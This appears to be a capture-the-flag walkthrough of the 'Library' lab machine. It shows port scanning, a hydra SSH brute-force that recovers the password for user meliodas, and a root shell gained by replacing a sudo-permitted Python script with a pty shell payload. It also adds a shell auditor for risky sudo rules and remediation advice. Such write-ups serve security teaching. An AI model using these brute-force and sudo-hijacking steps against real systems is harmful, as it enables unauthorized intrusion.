Library

1. Reconnaissance and Enumeration

1.1. Initial Port Scan

export TARGET_IP=10.10.37.96  # Set the target IP as an environment variable for convenience.
nmap -p- --min-rate 5000 $TARGET_IP

Results:

PORT   STATE SERVICE
22/tcp open ssh
80/tcp open http

1.2. Web Enumeration

We further investigate the web server running on port 80.

  • Direct Access: Browsing to http://10.10.37.96/ reveals a blog post authored by "meliodas". This is a potential username for later use.

  • robots.txt Analysis: Examining http://10.10.37.96/robots.txt reveals the following:

    User-agent: rockyou

    Interpretation: This is a strong hint. It implies that we should use the rockyou.txt wordlist, likely against the SSH service, given the potential username "meliodas".

2. Exploitation: SSH Brute-Force

hydra -V -l "meliodas" -P /usr/share/wordlists/rockyou.txt ssh://$TARGET_IP -f

Results:

[22][ssh] host: 10.10.37.96   login: meliodas   password: iloveyou1

Success: hydra successfully identifies the password "iloveyou1" for the user "meliodas".

3. Privilege Escalation

3.1. Initial Shell and Enumeration

We log in to the target machine using the discovered credentials:

ssh meliodas@10.10.37.96  # Password: iloveyou1

Once logged in, we perform basic system enumeration:

id

Output:

uid=1000(meliodas) gid=1000(meliodas) groups=1000(meliodas),4(adm),24(cdrom),30(dip),46(plugdev),114(lpadmin),115(sambashare)

The adm group membership is worth noting (on Ubuntu it grants read access to most of /var/log), but the sudo configuration gives a far more direct route:

sudo -l

Output:

(ALL) NOPASSWD: /usr/bin/python* /home/meliodas/bak.py

  • sudo -l: Lists the commands that "meliodas" can run with sudo. Crucially, "meliodas" may run /usr/bin/python* /home/meliodas/bak.py as root without a password (NOPASSWD). Two details make this exploitable: the wildcard means any interpreter in /usr/bin whose name begins with "python" is accepted, and the script path sits inside a directory that "meliodas" owns, so the user controls what the root interpreter executes. This is a significant misconfiguration and our path to privilege escalation.
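As an added example (this is not part of the original walkthrough), the shell functions below classify each target of a sudo rule by whether the invoking user could change what ends up running as root. It assumes only POSIX sh plus dirname, mktemp and chmod; the directory layout it builds is constructed for the demonstration, and the rule line it audits is the one printed above.

```sh
#!/bin/sh
# Added example, not from the original walkthrough. Classifies each target of a
# `sudo -l` rule by whether the calling user could alter what runs as root.
# Requires only POSIX sh, dirname, mktemp and chmod.

# Print a risk label for one path that sudo would execute:
#   WRITABLE    the file can be edited in place
#   REPLACEABLE the file is read-only, but its directory is writable, so it can
#               be unlinked and recreated (the bak.py situation on this box)
#   CREATABLE   the file does not exist and its directory is writable
#   WILDCARD    the token contains a glob; sudo matches it with fnmatch(3), so
#               any binary with a matching name is allowed
#   SAFE        neither the file nor its directory is writable by this user
classify_sudo_target() {
    target=$1
    case $target in
        *\**|*\?*|*\[*) echo WILDCARD; return 0 ;;
    esac
    dir=$(dirname "$target")
    if [ -e "$target" ]; then
        if [ -w "$target" ]; then
            echo WRITABLE
        elif [ -w "$dir" ]; then
            echo REPLACEABLE
        else
            echo SAFE
        fi
    elif [ -w "$dir" ]; then
        echo CREATABLE
    else
        echo SAFE
    fi
}

# Take one rule line in the format `sudo -l` prints, for example
#   (ALL) NOPASSWD: /usr/bin/python* /home/meliodas/bak.py
# and print "<label> <path>" for every absolute path in it. The loop runs in a
# subshell with globbing disabled (set -f) so that a token such as
# /usr/bin/python* is inspected as text instead of being expanded locally.
audit_sudo_rule() {
    cmds=${1#*: }
    (
        set -f
        for tok in $cmds; do
            case $tok in
                /*) printf '%s %s\n' "$(classify_sudo_target "$tok")" "$tok" ;;
            esac
        done
    )
}

# Build a constructed directory layout that mirrors the target: a home the user
# owns containing a script the user cannot write to, plus a locked
# subdirectory. Prints the path so callers can clean it up.
make_demo_home() {
    home=$(mktemp -d)
    printf 'import zipfile\n' > "$home/bak.py"
    chmod 444 "$home/bak.py"                 # read-only file, writable directory
    mkdir "$home/locked"
    printf 'import zipfile\n' > "$home/locked/fixed.py"
    chmod 444 "$home/locked/fixed.py"
    chmod 555 "$home/locked"                 # neither file nor directory writable
    echo "$home"
}

# Run against the rule from the walkthrough, then against the constructed home.
audit_sudo_rule '(ALL) NOPASSWD: /usr/bin/python* /home/meliodas/bak.py'
demo=$(make_demo_home)
audit_sudo_rule "(ALL) NOPASSWD: /usr/bin/python3 $demo/bak.py $demo/locked/fixed.py $demo/new.py"
chmod -R u+w "$demo" && rm -rf "$demo"
```

Run it as the unprivileged user whose sudo rules you are auditing; as root every path reports WRITABLE, since root's access checks succeed regardless of mode bits. Any result other than SAFE (or a WILDCARD token) is a rule worth a second look.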

3.2. Exploiting the Python Script

We examine the bak.py script:

cat /home/meliodas/bak.py

#!/usr/bin/env python
import os
import zipfile

# Walk the given directory tree and add every file to the open ZipFile.
def zipdir(path, ziph):
    for root, dirs, files in os.walk(path):
        for file in files:
            ziph.write(os.path.join(root, file))

# Back up the web root into /var/backups/website.zip.
if __name__ == '__main__':
    zipf = zipfile.ZipFile('/var/backups/website.zip', 'w', zipfile.ZIP_DEFLATED)
    zipdir('/var/www/html', zipf)
    zipf.close()

The script itself is harmless: it archives the web root. The problem is purely where it lives and who may run it as root.

3.3. Gaining Root Access

The file is removed rather than edited because it is not writable by meliodas (check with ls -l /home/meliodas/bak.py); the home directory is, however, so the file can be deleted and recreated under the same name. We replace bak.py with a one-liner that spawns a shell:

rm /home/meliodas/bak.py
echo 'import pty; pty.spawn("/bin/sh")' > /home/meliodas/bak.py

Explanation of Payload:

  • import pty: Imports the pty module, which creates pseudo-terminals.
  • pty.spawn("/bin/sh"): Runs /bin/sh attached to a new pseudo-terminal, so the resulting shell is fully interactive. Since sudo is invoked from a terminal here, os.system("/bin/sh") would also work, but a pty is the more robust choice when the calling context might not be a tty.

Now, we execute the modified script using sudo:

sudo /usr/bin/python /home/meliodas/bak.py
id

Output

uid=0(root) gid=0(root) groups=0(root)

Success! We have obtained a root shell. The id command confirms that we are now running as the root user (UID 0). The root cause is a sudo rule that points at a script inside a directory the unprivileged user owns; the fix is to move the script to a root-owned location (for example under /usr/local/sbin) and to drop the wildcard so the rule names a single interpreter.